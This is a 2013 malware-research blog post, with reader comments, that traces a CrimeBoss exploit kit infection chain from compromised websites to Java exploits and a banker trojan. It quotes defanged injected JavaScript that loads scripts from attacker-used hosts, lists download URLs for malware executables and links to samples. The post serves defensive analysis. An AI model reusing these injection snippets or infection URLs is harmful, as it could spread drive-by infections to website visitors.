Sunday, January 27, 2013

Hulk teams up with the Malware Crusaders to smash The CrimeBoss! (infector abrahamspath.org.uk//cb.php)

Background

This post is made 100% by one of our dedicated friend @Hulk_Crusader as the success story of a collaboration in fighting malware infector CrimeBoss. Thank's for Hulk for the hard work contributing his writing in our blog! Some of the analysis is still under-going so the details will be added regularly.
On a cold January night we find The Hulk passing time surfing the internet when he encounters what appears to be a CrimeBoss Exploit Kit Javascript injection on editorialconecta[.]com: Why can't puny malware just leave Hulk alone????!!! The script on abrahamspath.org.uk/cb.php checks if Java is enabled(slightly sanitized with <):
if(navigator.javaEnabled()) 
    {
    document.write(' 
    <script src="h00p://abrahamspath,org.uk//cb.php?action=jv&h=750139265">
    </script>'); }
If Java is enabled you are sent via a 302 redirect to
boyssuitsonline、com/jex/index.php?setup=d 
where again a check for Java is made (slightly sanitized with <):
if(navigator.javaEnabled()) 
  {
    document.write('<sc' + 'ri' + 'pt src=
    "h00p://boyssuitsonline,com/jex/index.php?setup=d&s=2&r=' + Math.floor(100000 + 
    (Math.random()*999999 + 1)) + '" type="text/javascript" 
    charset="iso-8859-1">
    </sc' + 'ri' + 'pt>');
    }
Finally the victim is presented with the actual landing page, Landing page sample is here -->>[PASTEBIN] The landing page again checks if Java is enabled.

[NEW] Analysis of Landing Page & Jars exploit used

I analyzed how the exploit worked, and noted it down. Is a bit long so I wrote it in seperate post page-->>[HERE] What is it with these moronz?? A malware PE binary rh.exe is downloaded from patuamusic.com,br/app/ if any of the Java applets successfully exploit the victim. See: VirusTotal analysis -->>[HERE] malwr.com analysis -->>[HERE] Network analysis shows a GET request for Instal.teaz from sonhodoseu.dominiotemporario,com/fugi/ This is actually another executable and appears to be a banker trojan. See: VirusTotal analysis -->>[HERE] malwr.com analysis -->>[HERE]

Infection Scheme

Below we added the infection scheme graph: RRRRAAAAAAARGGHHHHH!!! The Hulk and Malware Crusaders smash the evil CrimeBoss Kit but is this the last we've seen of this villain?
Only time will tell. But bad guyz beware: The Hulk and The Malware Crusaders are always looking for you and you will never know when we decide to smash you!!


*) abrahamspath.org.uk, boyssuitsonline.com, patuamusic.com.br and sonhodoseu.dominiotemporario.com are victimized sites & in some cases also, to include infectious code to spread malware to visitors.
PoC is as per below: And so many other infections:

Research, Sources & Samples

Samples as per above sample pic, can be received here -->>[MEDIAFIRE] Recent Infection URL of this Exploit Kit is here -->>[HERE] Similar analysis in Japanese --->>[HERE] The Regex to search infection hint: Written by: @Hulk_Crusader(main) & @unixfreaxjp (reference, analysis)
#MalwareMustDie!

6 comments:

  1. Excellent post, Hulkster! Great job!

    ReplyDelete
  2. I have a small question: while we were checking the exploit kit (even though the java was enabled), we were not able to see the landing page or the jar file. Please let us know what we are missing.

    Thanks,

    ReplyDelete
    Replies
    1. It is not mere Java as parameter that needed to achieve, yet the route of following the infection scheme from the infector > redirector > etc is also important. Have I mentioned in the previous posts that the usage of the real IP address (not proxy) also matter? Furthermore, many retries will caused you blocked or forwarded by the redirector, in the end, you got one shot to try, to prepare every requirement needed beforehand. I hope this tips helps.

      Delete
  3. Chrome says content from abrahamspath.org.uk has been inserted on my local nonprofit center for autism's webpage. What should I tell them to do?

    ReplyDelete
    Replies
    1. I am sorry I don't understand the question, could you please rephrase it?

      Delete